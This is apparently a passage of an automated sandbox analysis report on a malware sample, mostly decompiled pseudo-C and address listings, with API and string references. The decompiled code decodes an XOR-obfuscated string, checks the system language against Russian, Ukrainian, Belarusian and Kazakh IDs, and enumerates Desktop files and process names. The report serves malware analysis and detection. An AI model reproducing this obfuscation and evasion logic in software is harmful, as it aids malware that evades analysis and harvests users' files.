																_push(_t637);
																_push(_t379);
																 *[fs:0x0] =  &_v2188;
																_t522 = 0;
																_t572 =  &_v2212;
																asm("xorps xmm0, xmm0");
																_v2248 = 0;
																asm("movq [ebp-0x24], xmm0");
																_v2204 = 0;
																L97(); // executed
																_v2180 = 0;
																_t381 = _v2208;
																_t639 = _v2212;
																_v2252 = _t381;
																__eflags = _t639 - _t381;
																if(_t639 == _t381) {
																	L138:
																	_t523 = 0;
																	__eflags = 0;
																	goto L139;
																} else {
																	_v64 = 0x5d5d5b7c;
																	_v60 = 0x2e404f47;
																	_t658 =  *( *[fs:0x2c]);
																	_v120 = _t658;
																	do {
																		E0040BB10(_t522,  &_v104, _t620, _t639, _t639);
																		_v80 =  *((intOrPtr*)(_t639 + 0x18));
																		_v44 = 1;
																		_t414 =  *0x450fe0; // 0x8000000f
																		__eflags = _t414 -  *((intOrPtr*)(_t658 + 4));
																		if(_t414 >  *((intOrPtr*)(_t658 + 4))) {
																			E0040EEC8(_t414, 0x450fe0);
																			_t703 = _t703 + 4;
																			__eflags =  *0x450fe0 - 0xffffffff;
																			if(__eflags == 0) {
																				_t232 =  &_v64; // 0x5d5d5b7c
																				 *0x450d20 =  *_t232;
																				_t233 =  &_v60; // 0x2e404f47
																				 *0x450d24 =  *_t233;
																				E0040F1DA( &_v104, __eflags, 0x42ce60);
																				E0040EE7E(0x450fe0);
																				_t703 = _t703 + 8;
																			}
																		}
																		_t415 =  *0x450d27; // 0x0
																		__eflags = _t415;
																		if(_t415 != 0) {
																			 *0x450d20 =  *0x450d20 ^ 0x0000002e;
																			 *0x450d21 =  *0x450d21 ^ 0x0000002e;
																			 *0x450d22 =  *0x450d22 ^ 0x0000002e;
																			 *0x450d23 =  *0x450d23 ^ 0x0000002e;
																			 *0x450d24 =  *0x450d24 ^ 0x0000002e;
																			 *0x450d25 =  *0x450d25 ^ 0x0000002e;
																			 *0x450d26 =  *0x450d26 ^ 0x0000002e;
																			_t439 = _t415 ^ 0x0000002e;
																			__eflags = _t439;
																			 *0x450d27 = _t439;
																		}
																		_t416 = 0x450d20;
																		_v144 = 0;
																		_v128 = 0;
																		_v124 = 0xf;
																		_t237 =  &(_t416[1]); // 0x450d21
																		_t626 = _t237;
																		do {
																			_t589 =  *_t416;
																			_t416 =  &(_t416[1]);
																			__eflags = _t589;
																		} while (_t589 != 0);
																		E004026C0(_t522,  &_v144, 0x450d20, _t416 - _t626);
																		_t651 = _v104;
																		_t620 = _v88;
																		__eflags = _v124 - 0x10;
																		_v112 = _t522 | 0x00000001;
																		_t523 = _v144;
																		_t420 =  >=  ? _t523 :  &_v144;
																		__eflags = _v84 - 0x10;
																		_t572 =  >=  ? _t651 :  &_v104;
																		_t421 = E004028A0(_t572, _t620, _t572,  >=  ? _t523 :  &_v144, _v128);
																		_t703 = _t703 + 0xc;
																		__eflags = _t421 - 0xffffffff;
																		if(_t421 != 0xffffffff) {
																			L122:
																			_v105 = 1;
																		} else {
																			__eflags = _v84 - 0x10;
																			_t620 = _v88;
																			_t572 =  >=  ? _t651 :  &_v104;
																			_t438 = E004028A0(_t572, _t620, _t572, 0x439a6c, 7);
																			_t703 = _t703 + 0xc;
																			_v105 = 0;
																			__eflags = _t438 - 0xffffffff;
																			if(_t438 != 0xffffffff) {
																				goto L122;
																			}
																		}
																		_v112 = _v112 & 0xfffffffe;
																		_t422 = _v124;
																		__eflags = _t422 - 0x10;
																		if(_t422 < 0x10) {
																			L127:
																			__eflags = _v105;
																			if(_v105 != 0) {
																				L143:
																				_t423 = _v84;
																				__eflags = _t423 - 0x10;
																				if(_t423 < 0x10) {
																					L147:
																					_t639 = _v76;
																					_t523 = 1;
																					L139:
																					__eflags = _t639;
																					if(_t639 == 0) {
																						L149:
																						 *[fs:0x0] = _v52;
																						_pop(_t640);
																						_pop(_t653);
																						_pop(_t524);
																						__eflags = _v56 ^ _t672;
																						return E0040EB3F(_t523, _t524, _v56 ^ _t672, _t620, _t640, _t653);
																					} else {
																						_push(_t572);
																						E0040D300(_t639, _v72, _t639, _t651);
																						_t654 = _v76;
																						_t705 = _t703 + 4;
																						_t620 = (0x92492493 * (_v68 - _t654) >> 0x20) + _v68 - _t654 >> 4;
																						_t390 = _t654;
																						_t582 = ((_t620 >> 0x1f) + _t620) * 8 - (_t620 >> 0x1f) + _t620 << 2;
																						__eflags = _t582 - 0x1000;
																						if(_t582 < 0x1000) {
																							L148:
																							_push(_t582);
																							E0040ED7F(_t654);
																							goto L149;
																						} else {
																							_t654 =  *((intOrPtr*)(_t654 - 4));
																							_t582 = _t582 + 0x23;
																							__eflags = _t390 - _t654 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								E004134A7(_t523, _t620, __eflags);
																								goto L151;
																							} else {
																								goto L148;
																							}
																						}
																					}
																				} else {
																					_t279 = _t423 + 1; // 0x11
																					_t572 = _t279;
																					_t424 = _t651;
																					__eflags = _t572 - 0x1000;
																					if(_t572 < 0x1000) {
																						L146:
																						_push(_t572);
																						E0040ED7F(_t651);
																						_t703 = _t703 + 8;
																						goto L147;
																					} else {
																						_t654 =  *((intOrPtr*)(_t651 - 4));
																						_t582 = _t572 + 0x23;
																						__eflags = _t424 - _t654 + 0xfffffffc - 0x1f;
																						if(__eflags > 0) {
																							goto L151;
																						} else {
																							goto L146;
																						}
																					}
																				}
																			} else {
																				_t428 = _v80;
																				__eflags = _t428 - 0x419;
																				if(_t428 == 0x419) {
																					goto L143;
																				} else {
																					__eflags = _t428 - 0x422;
																					if(_t428 == 0x422) {
																						goto L143;
																					} else {
																						__eflags = _t428 - 0x423;
																						if(_t428 == 0x423) {
																							goto L143;
																						} else {
																							__eflags = _t428 - 0x43f;
																							if(_t428 == 0x43f) {
																								goto L143;
																							} else {
																								_v44 = 0;
																								_t429 = _v84;
																								__eflags = _t429 - 0x10;
																								if(_t429 < 0x10) {
																									goto L136;
																								} else {
																									_t263 = _t429 + 1; // 0x11
																									_t572 = _t263;
																									_t430 = _t651;
																									__eflags = _t572 - 0x1000;
																									if(_t572 < 0x1000) {
																										L135:
																										_push(_t572);
																										E0040ED7F(_t651);
																										_t703 = _t703 + 8;
																										goto L136;
																									} else {
																										_t654 =  *((intOrPtr*)(_t651 - 4));
																										_t582 = _t572 + 0x23;
																										__eflags = _t430 - _t654 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											goto L151;
																										} else {
																											goto L135;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t256 = _t422 + 1; // 0x11
																			_t572 = _t256;
																			_t434 = _t523;
																			__eflags = _t572 - 0x1000;
																			if(_t572 < 0x1000) {
																				L126:
																				_push(_t572);
																				E0040ED7F(_t523);
																				_t651 = _v104;
																				_t703 = _t703 + 8;
																				goto L127;
																			} else {
																				_t523 =  *(_t523 - 4);
																				_t582 = _t572 + 0x23;
																				__eflags = _t434 - _t523 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					L151:
																					E004134A7(_t523, _t620, __eflags);
																					asm("int3");
																					asm("int3");
																					_push(_t672);
																					_t674 = _t705;
																					_t396 =  *0x43d054; // 0x8e1b5714
																					_v2304 = _t396 ^ _t674;
																					_push(_t654);
																					_push(_t639);
																					_t641 = _t582;
																					_v2572 = _t641;
																					_v2572 = _t641;
																					_t398 =  *0x439a7c; // 0x3e
																					asm("movq xmm0, [0x439a74]");
																					_v2556 = _t398;
																					asm("movq [ebp-0x108], xmm0");
																					E00410A80(_t641,  &_v2554, 0, 0xfa);
																					_t656 = OpenProcess(0x410, 0, _t620);
																					__eflags = _t656;
																					if(_t656 != 0) {
																						_t409 =  &_v316;
																						__imp__K32EnumProcessModules(_t656, _t409, 4,  &_v312); // executed
																						__eflags = _t409;
																						if(_t409 != 0) {
																							__imp__K32GetModuleBaseNameA(_t656, _v316,  &_v308, 0x104); // executed
																						}
																					}
																					FindCloseChangeNotification(_t656); // executed
																					_t583 =  &_v308;
																					 *_t641 = 0;
																					_t641[4] = 0;
																					_t625 = _t583 + 1;
																					_t641[5] = 0xf;
																					 *_t641 = 0;
																					do {
																						_t403 =  *_t583;
																						_t583 = _t583 + 1;
																						__eflags = _t403;
																					} while (_t403 != 0);
																					E004026C0(_t523, _t641,  &_v308, _t583 - _t625);
																					_pop(_t642);
																					__eflags = _v48 ^ _t674;
																					_pop(_t657);
																					return E0040EB3F(_t641, _t523, _v48 ^ _t674, _t625, _t642, _t657);
																				} else {
																					goto L126;
																				}
																			}
																		}
																		goto L158;
																		L136:
																		_t522 = _v112;
																		_t639 = _t639 + 0x1c;
																		_t658 = _v120;
																		__eflags = _t639 - _v116;
																	} while (_t639 != _v116);
																	_t639 = _v76;
																	goto L138;
																}
															} else {
																goto L107;
															}
														}
													}
													goto L158;
													L108:
													_t637 = _t637 + 1;
													__eflags = _t637 - _v1592;
												} while (_t637 < _v1592);
												goto L109;
											}
										} else {
											goto L59;
										}
									}
								}
							} else {
								goto L13;
							}
						}
					}
				}
				L158:
			}

0x00404490
0x00404491
0x00404499
0x004044a0
0x004044a4
0x004044a6
0x004044a8
0x004044b3
0x004044b4
0x004044b5
0x004044bb
0x004044c0
0x004044c2
0x004044c5
0x004044c6
0x004044c7
0x004044cb
0x004044d1
0x004044d8
0x004044db
0x004044e0
0x004044e7
0x004044ee
0x004044f5
0x00404500
0x00404504
0x00404509
0x0040450d
0x00404512
0x0040451a
0x00404543
0x00404555
0x0040451c
0x00404522
0x00404525
0x0040452d
0x00404531
0x00404535
0x00404535
0x00404567
0x0040456d
0x00404573
0x00404578
0x0040465b
0x0040465b
0x0040465e
0x00404661
0x00404669
0x004046e8
0x004046e8
0x00000000
0x00404670
0x00404670
0x00404674
0x00404683
0x0040468e
0x00404691
0x00404694
0x00404699
0x0040469e
0x004046a4
0x004046a7
0x00000000
0x00000000
0x004046b0
0x004046dd
0x004046dd
0x004046e6
0x00000000
0x00000000
0x00000000
0x00000000
0x004046b2
0x004046b2
0x004046b2
0x004046b5
0x004046bd
0x004046d3
0x004046d3
0x004046d5
0x004046da
0x00000000
0x004046bf
0x004046bf
0x004046c2
0x004046cd
0x00000000
0x00000000
0x00000000
0x00000000
0x004046cd
0x004046bd
0x00000000
0x004046b0
0x004047c7
0x004047ca
0x004047f3
0x004047f3
0x004046ea
0x004046ea
0x004046f0
0x0040471e
0x0040471e
0x00404721
0x00404728
0x0040472f
0x00404735
0x0040479f
0x0040479f
0x004047a5
0x00404807
0x0040480c
0x00404814
0x00404815
0x00404826
0x004047a7
0x004047a7
0x004047aa
0x004047ab
0x004047b3
0x004047fd
0x004047fd
0x004047ff
0x00000000
0x004047b5
0x004047b5
0x004047b8
0x004047c3
0x00000000
0x004047c5
0x00000000
0x004047c5
0x004047c3
0x004047b3
0x00404737
0x0040473a
0x0040473b
0x00404748
0x0040474b
0x00404752
0x0040475f
0x00404761
0x0040476a
0x00404780
0x00404780
0x00404782
0x00404787
0x0040478a
0x00404791
0x00404798
0x00000000
0x0040476c
0x0040476c
0x0040476f
0x0040477a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040477a
0x0040476a
0x004046f2
0x004046f2
0x004046f5
0x004046f6
0x004046fe
0x00404714
0x00404714
0x00404716
0x0040471b
0x00000000
0x00404700
0x00404700
0x00404703
0x0040470e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040470e
0x004046fe
0x004047cc
0x004047cc
0x004047cc
0x004047cf
0x004047d1
0x004047d7
0x004047e9
0x004047e9
0x004047eb
0x004047f0
0x00000000
0x004047d9
0x004047d9
0x004047dc
0x004047e4
0x004047e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004047e7
0x004047d7
0x004047ca
0x0040457e
0x0040457e
0x0040457e
0x004045b2
0x004045b2
0x004045b2
0x004045b4
0x004045b5
0x004045c6
0x004045cb
0x004045cf
0x004045d5
0x00404600
0x00404601
0x00404605
0x0040460a
0x004045d7
0x004045d7
0x004045db
0x004045e1
0x004045e6
0x004045ea
0x004045ed
0x004045f2
0x004045f7
0x004045f7
0x0040460d
0x00404614
0x00404642
0x0040464a
0x0040464e
0x00404590
0x00404590
0x00404596
0x0040459d
0x004045a4
0x004045a7
0x004045ae
0x00000000
0x00404654
0x00404655
0x00000000
0x00404655
0x00404616
0x00404616
0x00404619
0x0040461a
0x00404622
0x00404638
0x00404638
0x0040463a
0x0040463f
0x00000000
0x00404624
0x00404624
0x00404627
0x00404632
0x00404827
0x00404827
0x0040482c
0x0040482c
0x00404831
0x00404832
0x00404833
0x00404834
0x00404835
0x00404836
0x00404837
0x00404838
0x00404839
0x0040483a
0x0040483b
0x0040483c
0x0040483d
0x0040483e
0x0040483f
0x00404840
0x00404841
0x00404849
0x0040484c
0x00404850
0x00404854
0x00404856
0x00404858
0x00404863
0x00404864
0x00404865
0x00404868
0x0040486d
0x0040486f
0x00404872
0x00404873
0x00404874
0x00404878
0x00404884
0x0040488b
0x00404892
0x00404899
0x0040489b
0x004048a0
0x004048a6
0x004048ad
0x004048b2
0x004048b5
0x004048bc
0x004048be
0x004048cb
0x004048d3
0x004048d8
0x004048e5
0x004048ea
0x004048ea
0x004048bc
0x004048ed
0x004048f4
0x004048f6
0x004048f6
0x00404900
0x00404900
0x00404907
0x00404908
0x00404908
0x00404900
0x0040490d
0x00404912
0x00404919
0x00404920
0x00404927
0x0040492b
0x0040492b
0x00404930
0x00404930
0x00404932
0x00404933
0x00404933
0x00404942
0x00404947
0x00404951
0x00404955
0x0040495a
0x0040495f
0x00404961
0x00404968
0x0040496a
0x00404971
0x00404974
0x0040497b
0x0040497f
0x0040497f
0x00404982
0x00404982
0x00404984
0x00404985
0x00404985
0x00404990
0x00404995
0x00404999
0x0040499c
0x0040499f
0x004049cd
0x004049cd
0x004049d2
0x004049d7
0x004049de
0x004049e5
0x004049e9
0x004049eb
0x004049f0
0x004049f3
0x00404a16
0x00404a1a
0x00404a1d
0x00404a20
0x00404a22
0x004049f5
0x004049f5
0x004049fb
0x004049fe
0x00404a02
0x00404a04
0x00404a07
0x00404a08
0x00404a0d
0x00404a10
0x00404a10
0x00404a27
0x00404a2c
0x00404a33
0x00404a3a
0x00404a3e
0x00404a44
0x00404a4b
0x00404a50
0x00404a53
0x00404a5a
0x00404a5c
0x00404a69
0x00404a71
0x00404a76
0x00404a83
0x00404a88
0x00404a88
0x00404a5a
0x00404a8b
0x00404a90
0x00404a92
0x00404a94
0x00404a9b
0x00404aa2
0x00404aa9
0x00404ab0
0x00404ab7
0x00404abe
0x00404ac5
0x00404acc
0x00404acc
0x00404ace
0x00404ace
0x00404ad3
0x00404ad6
0x00404adb
0x00404add
0x00404add
0x00404ae0
0x00404ae6
0x00404aed
0x00404af4
0x00404af4
0x00404af6
0x00404af7
0x00404af7
0x00404b05
0x00404b0d
0x00404b12
0x00404b15
0x00404b19
0x00404b1b
0x00404b20
0x00404b24
0x00404b2a
0x00404b31
0x00404b36
0x00404b39
0x00404b40
0x00404b42
0x00404b51
0x00404b58
0x00404b5d
0x00404b6a
0x00404b6f
0x00404b6f
0x00404b40
0x00404b72
0x00404b77
0x00404b79
0x00404b7b
0x00404b84
0x00404b8b
0x00404b8f
0x00404b94
0x00404b94
0x00404b9b
0x00404b9e
0x00404ba3
0x00404ba5
0x00404ba5
0x00404ba8
0x00404bae
0x00404bb5
0x00404bc0
0x00404bc0
0x00404bc2
0x00404bc3
0x00404bc3
0x00404bd1
0x00404bd9
0x00404bde
0x00404be1
0x00404be7
0x00404be9
0x00404bee
0x00404bf2
0x00404bf8
0x00404bff
0x00404c04
0x00404c07
0x00404c0e
0x00404c10
0x00404c20
0x00404c27
0x00404c2d
0x00404c3a
0x00404c3f
0x00404c3f
0x00404c0e
0x00404c42
0x00404c49
0x00404c4b
0x00404c52
0x00404c57
0x00404c5e
0x00404c62
0x00404c70
0x00404c70
0x00404c77
0x00404c78
0x00404c78
0x00404c70
0x00404c7d
0x00404c80
0x00404c85
0x00404c87
0x00404c87
0x00404c8a
0x00404c90
0x00404c97
0x00404ca0
0x00404ca0
0x00404ca2
0x00404ca3
0x00404ca3
0x00404cb1
0x00404cb9
0x00404cbe
0x00404cc1
0x00404cc3
0x00404cd8
0x00404cd8
0x00404cd8
0x00404cc5
0x00404cc5
0x00404cc9
0x00000000
0x00404ccb
0x00404ccb
0x00404ccf
0x00000000
0x00404cd1
0x00404cd1
0x00404cd1
0x00404ccf
0x00404cc9
0x00404cda
0x00404cdd
0x00404ce0
0x00404d0a
0x00404d0f
0x00404d17
0x00404d18
0x00404d1c
0x00404d29
0x00404ce2
0x00404ce2
0x00404ce5
0x00404ce6
0x00404ce8
0x00404cee
0x00404d00
0x00404d00
0x00404d02
0x00000000
0x00404cf0
0x00404cf0
0x00404cf3
0x00404cfb
0x00404cfe
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cfe
0x00404cee
0x004049a1
0x004049a1
0x004049a4
0x004049a5
0x004049a7
0x004049ad
0x004049c3
0x004049c3
0x004049c5
0x004049ca
0x00000000
0x004049af
0x004049af
0x004049b2
0x004049ba
0x004049bd
0x00404d2a
0x00404d2f
0x00404d2f
0x00404d34
0x00404d35
0x00404d36
0x00404d37
0x00404d38
0x00404d39
0x00404d3a
0x00404d3b
0x00404d3c
0x00404d3d
0x00404d3e
0x00404d3f
0x00404d40
0x00404d41
0x00404d49
0x00404d4c
0x00404d50
0x00404d54
0x00404d56
0x00404d58
0x00404d63
0x00404d64
0x00404d65
0x00404d6b
0x00404d70
0x00404d72
0x00404d75
0x00404d76
0x00404d77
0x00404d7b
0x00404d81
0x00404d83
0x00404d89
0x00404d8f
0x00404d92
0x00404d9c
0x00404da0
0x00404da7
0x00404dad
0x00404db4
0x00404dc1
0x00404dce
0x00404dd8
0x00404dde
0x00404de0
0x00404de6
0x00404de8
0x00404efa
0x00404eff
0x00404f07
0x00404f08
0x00404f0c
0x00404f19
0x00404df0
0x00404df0
0x00404df0
0x00404e07
0x00404e0d
0x00404e13
0x00404e19
0x00404e23
0x00404e2d
0x00404e30
0x00404e3a
0x00404e41
0x00404e41
0x00404e43
0x00404e44
0x00404e44
0x00404e58
0x00404e5d
0x00404e63
0x00404e69
0x00404e70
0x00404e73
0x00404e76
0x00404eaa
0x00404eab
0x00404eae
0x00404eb3
0x00404e78
0x00404e78
0x00404e7f
0x00404e84
0x00404e8b
0x00404e8e
0x00404e96
0x00404e9b
0x00404e9e
0x00404e9e
0x00404eb9
0x00404ebd
0x00404ec0
0x00000000
0x00404ec2
0x00404ec2
0x00404ec8
0x00404ec9
0x00404ecb
0x00404ed1
0x00404ee3
0x00404ee3
0x00404ee5
0x00404eea
0x00000000
0x00404ed3
0x00404ed3
0x00404ed6
0x00404ede
0x00404ee1
0x00404f1a
0x00404f1f
0x00404f20
0x00404f21
0x00404f23
0x00404f25
0x00404f30
0x00404f31
0x00404f34
0x00404f39
0x00404f3b
0x00404f3e
0x00404f3f
0x00404f40
0x00404f41
0x00404f45
0x00404f4b
0x00404f4d
0x00404f50
0x00404f53
0x00404f56
0x00404f5b
0x00404f5e
0x00404f63
0x00404f66
0x00404f69
0x00404f6c
0x00404f6f
0x00404f71
0x00405185
0x00405185
0x00405185
0x00000000
0x00404f77
0x00404f7d
0x00404f84
0x00404f8b
0x00404f8d
0x00404f90
0x00404f94
0x00404f9c
0x00404f9f
0x00404fa3
0x00404fa8
0x00404fae
0x00404fb5
0x00404fba
0x00404fbd
0x00404fc4
0x00404fc6
0x00404fc9
0x00404fce
0x00404fd6
0x00404fdb
0x00404fe8
0x00404fed
0x00404fed
0x00404fc4
0x00404ff0
0x00404ff5
0x00404ff7
0x00404ff9
0x00405000
0x00405007
0x0040500e
0x00405015
0x0040501c
0x00405023
0x0040502a
0x0040502a
0x0040502c
0x0040502c
0x00405031
0x00405036
0x0040503d
0x00405044
0x0040504b
0x0040504b
0x00405050
0x00405050
0x00405052
0x00405053
0x00405053
0x00405062
0x0040506a
0x00405070
0x00405079
0x0040507d
0x00405080
0x00405083
0x00405086
0x0040508b
0x0040508f
0x00405094
0x00405097
0x0040509a
0x004050c2
0x004050c2
0x0040509c
0x0040509c
0x004050a3
0x004050a8
0x004050b1
0x004050b6
0x004050b9
0x004050bd
0x004050c0
0x00000000
0x00000000
0x004050c0
0x004050c6
0x004050ca
0x004050cd
0x004050d0
0x00405100
0x00405100
0x00405104
0x004051e0
0x004051e0
0x004051e3
0x004051e6
0x0040520f
0x0040520f
0x00405212
0x00405187
0x00405187
0x00405189
0x00405226
0x0040522b
0x00405233
0x00405234
0x00405235
0x00405239
0x00405243
0x0040518f
0x00405192
0x00405195
0x004051a2
0x004051a5
0x004051ae
0x004051c1
0x004051c3
0x004051c6
0x004051cc
0x0040521c
0x0040521c
0x0040521e
0x00000000
0x004051ce
0x004051ce
0x004051d1
0x004051d9
0x004051dc
0x00405244
0x00000000
0x004051de
0x00000000
0x004051de
0x004051dc
0x004051cc
0x004051e8
0x004051e8
0x004051e8
0x004051eb
0x004051ed
0x004051f3
0x00405205
0x00405205
0x00405207
0x0040520c
0x00000000
0x004051f5
0x004051f5
0x004051f8
0x00405200
0x00405203
0x00000000
0x00000000
0x00000000
0x00000000
0x00405203
0x004051f3
0x0040510a
0x0040510a
0x0040510d
0x00405112
0x00000000
0x00405118
0x00405118
0x0040511d
0x00000000
0x00405123
0x00405123
0x00405128
0x00000000
0x0040512e
0x0040512e
0x00405133
0x00000000
0x00405139
0x00405139
0x0040513d
0x00405140
0x00405143
0x00000000
0x00405145
0x00405145
0x00405145
0x00405148
0x0040514a
0x00405150
0x00405166
0x00405166
0x00405168
0x0040516d
0x00000000
0x00405152
0x00405152
0x00405155
0x0040515d
0x00405160
0x00000000
0x00000000
0x00000000
0x00000000
0x00405160
0x00405150
0x00405143
0x00405133
0x00405128
0x0040511d
0x00405112
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x004050d7
0x004050dd
0x004050f3
0x004050f3
0x004050f5
0x004050fa
0x004050fd
0x00000000
0x004050df
0x004050df
0x004050e2
0x004050ea
0x004050ed
0x00405249
0x00405249
0x0040524e
0x0040524f
0x00405250
0x00405251
0x00405259
0x00405260
0x00405263
0x00405264
0x00405265
0x00405269
0x0040526f
0x00405275
0x0040527b
0x00405288
0x00405298
0x004052a0
0x004052b6
0x004052b8
0x004052ba
0x004052c5
0x004052cd
0x004052d3
0x004052d5
0x004052ea
0x004052ea
0x004052d5
0x004052f1
0x004052f7
0x004052fd
0x00405303
0x0040530a
0x0040530d
0x00405314
0x00405317
0x00405317
0x00405319
0x0040531a
0x0040531a
0x0040532a
0x00405334
0x00405335
0x00405337
0x00405340
0x00000000
0x00000000
0x00000000
0x004050ed
0x004050dd
0x00000000
0x00405170
0x00405170
0x00405173
0x00405176
0x00405179
0x00405179
0x00405182
0x00000000
0x00405182
0x00000000
0x00000000
0x00000000
0x00404ee1
0x00404ed1
0x00000000
0x00404eed
0x00404eed
0x00404eee
0x00404eee
0x00000000
0x00404df0
0x00000000
0x00000000
0x00000000
0x004049bd
0x004049ad
0x00000000
0x00000000
0x00000000
0x00404632
0x00404622
0x00404614
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,?,00000002,00000000,00439A5C,00000002,00000000), ref: 0040456D
FindNextFileA.KERNELBASE(00000000,?,00000000,00000000,?,?), ref: 0040464A
FindClose.KERNELBASE(00000000), ref: 00404655
__Init_thread_footer.LIBCMT ref: 004048E5
__Init_thread_footer.LIBCMT ref: 00404A83

Strings

mmBK, xrefs: 00404A2C
\Desktop, xrefs: 004049EB
{}k|, xrefs: 00404884
O@K\, xrefs: 00404A33

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Find$FileInit_thread_footer$CloseFirstNext
String ID: O@K\$\Desktop$mmBK${}k|
API String ID: 3881311970-1521651405
Opcode ID: f9145b10adc208b690ca63000b2da85c0f639136541111d44534ffdca4568c66
Instruction ID: d7330ead17b1e3520cd4e277c6f23062474a6e7005e4ea855cb59a35f150ec0e
Opcode Fuzzy Hash: f9145b10adc208b690ca63000b2da85c0f639136541111d44534ffdca4568c66
Instruction Fuzzy Hash: 533269B1D002448BEB14DF68DC457AEBBB0EF46304F14467EE8057B2D2D7B8A985CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00409670 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 599
sleepCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00409670(void* __ecx, void* __edx, signed int __edi, void* __esi) {
				intOrPtr _v8;
				signed char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				signed char _v48;
				signed int _v52;
				signed char _v56;
				signed int _v60;
				signed char _v76;
				signed char _v80;
				signed char _v84;
				signed char _v100;
				signed char _v124;
				signed char _v128;
				signed char _v132;
				signed char _v164;
				char _v172;
				intOrPtr _v176;
				intOrPtr _v192;
				signed int _v196;
				signed int* _v208;
				signed int* _v224;
				signed int* _v240;
				char _v252;
				char _v268;
				char _v444;
				char _v445;
				signed char _v452;
				signed char _v456;
				signed int _v472;
				signed int _v476;
				signed char _v480;
				signed int _v496;
				char _v520;
				signed int _v556;
				intOrPtr _v564;
				void* __ebx;
				void* __ebp;
				signed int _t200;
				signed int _t201;
				intOrPtr _t205;
				intOrPtr _t218;
				void* _t221;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t248;
				signed char _t249;
				signed char _t250;
				void* _t257;
				signed char _t270;
				signed char _t272;
				signed char _t275;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t292;
				signed int _t296;
				intOrPtr _t300;
				signed char _t301;
				signed char _t302;
				char _t304;
				intOrPtr _t316;
				signed char _t317;
				signed char _t318;
				signed char* _t320;
				signed int _t322;
				signed char _t332;
				intOrPtr* _t334;
				signed int _t336;
				void* _t341;
				intOrPtr _t342;
				void* _t344;
				void* _t346;
				intOrPtr* _t349;
				void* _t362;
				signed char* _t370;
				void* _t383;
				signed char _t384;
				signed int _t385;
				signed char* _t389;
				signed char* _t393;
				signed char _t397;
				signed char* _t406;
				signed char _t409;
				long _t411;
				signed char _t413;
				void* _t414;
				signed char* _t415;
				signed char* _t417;
				signed char _t418;
				void* _t419;
				void* _t421;
				void* _t426;
				signed int _t429;
				signed int _t430;
				void* _t433;
				signed int _t436;
				void* _t439;
				void* _t440;
				void* _t441;
				signed int _t442;
				void* _t450;
				void* _t454;
				void* _t492;

				_t420 = __edi;
				_t344 = _t433;
				_t436 = (_t433 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t344 + 4));
				_t429 = _t436;
				_push(0xffffffff);
				_push(0x42ca30);
				_push( *[fs:0x0]);
				_push(_t344);
				_t200 =  *0x43d054; // 0x8e1b5714
				_t201 = _t200 ^ _t429;
				_v32 = _t201;
				_push(__esi);
				_push(__edi);
				_push(_t201);
				 *[fs:0x0] =  &_v24;
				_t424 =  *((intOrPtr*)(_t344 + 0x10));
				_v40 = 0;
				E00417D97(__ecx, E004187F3(__ecx, __edx, 0));
				_t349 =  *((intOrPtr*)(_t344 + 0x10));
				_v76 = 0;
				_t439 = _t436 - 0x1f0 + 8;
				_v60 = 0;
				_v56 = 0xf;
				_t402 = _t349 + 1;
				do {
					_t205 =  *_t349;
					_t349 = _t349 + 1;
					_t456 = _t205;
				} while (_t205 != 0);
				E004026C0(_t344,  &_v76, _t424, _t349 - _t402);
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				E00410A80(__edi,  &_v268, 0, 0xa8);
				_t440 = _t439 + 8;
				_v268 = 0x439cec;
				_v164 = 0;
				asm("xorps xmm0, xmm0");
				_v132 = 0;
				_v128 = 0;
				_v124 = 0;
				_v172 = 0x439ca8;
				_v176 = 0x48;
				asm("movlpd [ebp-0xf8], xmm0");
				E0040C380( &_v172, _t402, _t456,  &_v252);
				_t26 = _v268 + 4; // 0x60
				 *((intOrPtr*)(_t429 +  *_t26 - 0x100)) = 0x439d00;
				_t30 = _v268 + 4; // 0x43a364
				_t31 =  *_t30 - 0x60; // 0x43a304
				 *((intOrPtr*)(_t429 +  *_t30 - 0x104)) = _t31;
				_t354 =  &_v252;
				E0040C2B0(_t354, _t456);
				_t425 = _v60;
				_t217 =  >=  ? _v76 :  &_v76;
				_v40 =  >=  ? _v76 :  &_v76;
				_t218 = 2;
				_v252 = 0x439c40;
				if(_t425 > 0x7fffffff) {
					E0040DF79(_t344, __eflags);
					goto L88;
				} else {
					if(_t425 == 0) {
						_v196 = 0;
						L11:
						_push(_t354);
						_t403 =  &_v100;
						_v192 = _t218;
						_v100 = 0;
						_v84 = 0;
						_v80 = 0xf;
						_t242 = E0040D690( &_v268,  &_v100);
						_t440 = _t440 + 4;
						if(( *( *((intOrPtr*)( *_t242 + 4)) + _t242 + 0xc) & 0x00000006) == 0) {
							do {
								_t332 = _v48;
								_push( &_v100);
								if(_t332 == _v44) {
									_push(_t332);
									_t397 =  &_v52;
									E0040CFB0(_t344, _t397, _t420, _t425);
								} else {
									_t397 = _t332;
									E0040BB10(_t344, _t397, _t403, _t420);
									_v48 = _v48 + 0x18;
								}
								_push(_t397);
								_t403 =  &_v100;
								_t334 = E0040D690( &_v268,  &_v100);
								_t440 = _t440 + 4;
							} while (( *( *((intOrPtr*)( *_t334 + 4)) + _t334 + 0xc) & 0x00000006) == 0);
						}
